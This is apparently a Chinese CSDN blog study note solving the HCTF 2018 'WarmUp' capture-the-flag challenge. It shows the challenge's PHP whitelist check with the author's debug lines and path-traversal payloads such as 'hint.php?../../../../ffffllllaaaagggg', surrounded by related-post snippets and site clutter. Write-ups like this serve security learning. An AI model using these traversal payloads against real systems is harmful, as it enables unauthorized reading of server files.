[HCTF 2018]WarmUp

最新推荐文章于 2024-06-26 20:30:00 发布
最新推荐文章于 2024-06-26 20:30:00 发布
阅读量185 收藏
点赞数
分类专栏: 极客大挑战 PHP总结 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anyhowanywhere/article/details/127055958
版权

[HCTF 2018]WarmUp

学习记录 这个属于文件跳转

f12 编辑
可以看到代码

 class emmm
    {
        public static function checkFile(&$page)
        {
            //先看一下对函数里输入了什么
			$a=&$page;
			echo $a."<br>";
 
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }
 
            if (in_array($page, $whitelist)) {
                return true;
            }
 
            echo mb_strpos($page . '?', '?')."<br>";//没匹配到所以返回字符串长度
 
            $_page = mb_substr($page,0, mb_strpos($page . '?', '?'));
 
			echo "2".$_page."<br>";//经过一次后返回值
            if (in_array($_page, $whitelist)) {
                return true;
            }
 
            $_page = urldecode($page);
 
			echo "3".$_page."<br>";//二次编码后的返回值
 
			echo mb_strpos($page . '?', '?')."<br>";//注意输出时与第一次的区别
 
            $_page = mb_substr($page,0, mb_strpos($_page . '?', '?'));
 
			echo "4".$_page."<br>";//再次看经过截取后的输出
 
            if (in_array($_page, $whitelist)) {
				echo "sdf you can't see it";//证明进入该函数
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

我们看到 hint.php 文件

        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];

这里可以知道flag应该在叫ffffllllaaaagggg的文件中

重点是我们不知道具体在那个文件中,所以用…/来返回上层目录一个一个的刷新试
$page=hint.php?/…/ffffllllaaaagggg
$page=hint.php?/…/…/ffffllllaaaagggg

hint.php?../../../../ffffllllaaaagggg
小*-^-*九
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
HCTF2018 WarmUp
BlueDoorZz的博客
07-11 412
BUU第一题,老实说第一次做的时候手足无措。 0x01 题目类型:php代码审计,文件包含。 0x02 点开链接,开门见山就是一个大大的滑稽。 查看源代码,注释中提醒有source.php文件。访问source.php,看到源码。 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) {
TensorFlow Serving API设置warmup
01-07
运行后附代码文件生成tf_serving_warmup_requests文件; 置其于模型保存文件夹内的assets.extra文件夹下; 重启docker API即可,可观察到屏幕输出显示warmp启动成功; 保存模型的文件结构于是乎成为: . ├── ...
[HCTF 2018]WarmUp 题解
偷一个月亮
09-01 2262
[HCTF 2018]WarmUp <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($pag...
buuctf web warmup详细题解
weixin_64160292的博客
03-31 3047
题目:warmup 题目来源:buuctf 分析过程: 1. 首先ctrl + u 查看源代码,我们发现有一个source.php文件 2. 我们打开source.php文件,是一段代码,这道题要我们代码审计。 3. 与source文件相似的hint.php文件我们也打开看一下,它说flag在ffffllllaaaagggg中。 正在上传… 4. 然后回来source.php看这段代码,通过上网查询关于php的函数的用法。然后审计代码得出,...
HCTF 2018 Warm up
qq_53689523的博客
02-06 135
所以,可以知道flag在ffffllllaaaagggg中,接下来,我们分析source.php文件,我们看到其设置了白名单(source.php和hint.php),如果不在白名单内,直接返回False,根本就不会执行文件查询语句,所以只有构造url,绕过source.php,才可以访问到ffffllllaaaagggg文件。看到源代码里提示一个source.php文件,所以我们猜测,要么是加载过来一个php文件(可是F12以后,没有发现),要么就是当前目录下有个source.php。
[ctf]HCTF 2018 warmup超详详详详解
momoadsp的博客
05-11 3738
打开以后发现是一个jpg图片,查看源代码 发现被注释掉的source.php 访问 发现了,因为high_file而被泄漏的源代码 发现除了source.php,还有hint.php 我们访问hint.php 我们知道了flag在ffffllllaaaagggg中 接着我们来分析代码 <?php highlight_file(__FILE__); class emmm { public static function checkFile
BUUCTF WEB HCTF 2018 WarmUp
Ethan552525的博客
07-11 840
1:题目 2:解题 2.1:查看源码 按F12发现提示:<!--source.php--> 2.2:尝试打开source.php http://f25ece33-0891-47a1-b89a-eefac33b2f4f.node4.buuoj.cn/source.php 得到代码: 2.3:解析代码 2.3.1:代码正文解析 if (! empty($_REQUEST['file']) &...
【BUUCTF】 HCTF2018 WarmUp
m0_68259687的博客
08-19 196
前面的部分重新赋予$page,且这部分必须包含source.php或者hint.php,因此我们可以猜出这个请求应该是。大致意思是,只有链接中包含了file文件请求且通过了checkFile函数的验证,那么将把链接包含的file文件include到页面中,否则输出一张图片(推测为那个滑稽头像)可以看到 函数会检查file请求是否为空,是否是字符串等,且只有在参数中包含了source .php或者hint.php时才会生效。按照常规思路f12,看一看有什么,结果发现了一个名为source.php的注释。
HCTF 2018 WarmUp Wp
Luminous_song的博客
08-28 290
首先打开页面是一个滑稽的表情,直接F12看到source.php的提示 ok/source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
SharePoint Warm up WSP包
05-10
SharePoint Warm up WSP包是一种专门针对SharePoint环境优化启动速度的解决方案。在SharePoint环境中,初次访问或者长时间未访问的网站集可能会因为缓存、IIS应用程序池回收等因素导致加载速度较慢。这种现象通常被...
WarmUp
03-26
暖身
composer-warmup
05-27
OpCode Warmer(composer插件) 通过预热OpCode优化您的应用... recommendedopcache.file_update_protection =0用法$ cd my-project$ composer warmup-opcode它是如何工作的? 从PHP 7.0开始,OpCache扩展能够将编译
neo_warmup:热身 Neo4j
06-05
构建它: mvn clean package将 target/warmup-1.0.jar 复制到 Neo4j 服务器的 plugins/ 目录中。 通过在 conf/neo4j-server.properties 中添加一行来配置 Neo4j: org.neo4j.server.thirdparty_jaxrs_classes=...
发布一个Yii2扩展把debug信息存储到MongoDB中
yagas的专栏
06-26 279
本项目为yii2-debug的扩展,使用MongoDB对debug数据进行存储。如果使用Yii2进行多个应用的开发的话,把debug信息汇聚到一起可以方便查阅。
火车头采集器Discuz采集发布模块插件
最新发布
ccchen888的博客
06-26 582
Discuz论坛采集发布插件下载及使用教程说明,解决discuz门户文章,论坛帖子批量发布问题。
梅花易数排盘 api数据接口
尘中客的博客
06-24 413
什么是梅花易数:梅花易数为北宋易学家邵雍所传,因观梅知易数而得名。以卦象生克为主,而不分析爻象。是为梅花易数预测。
LAMP架构的源码编译环境下部署Discuz论坛
EsDeath_99的博客
06-26 1084
LAMP架构是一种常见的用于构建动态网站的技术栈。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小*-^-*九

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值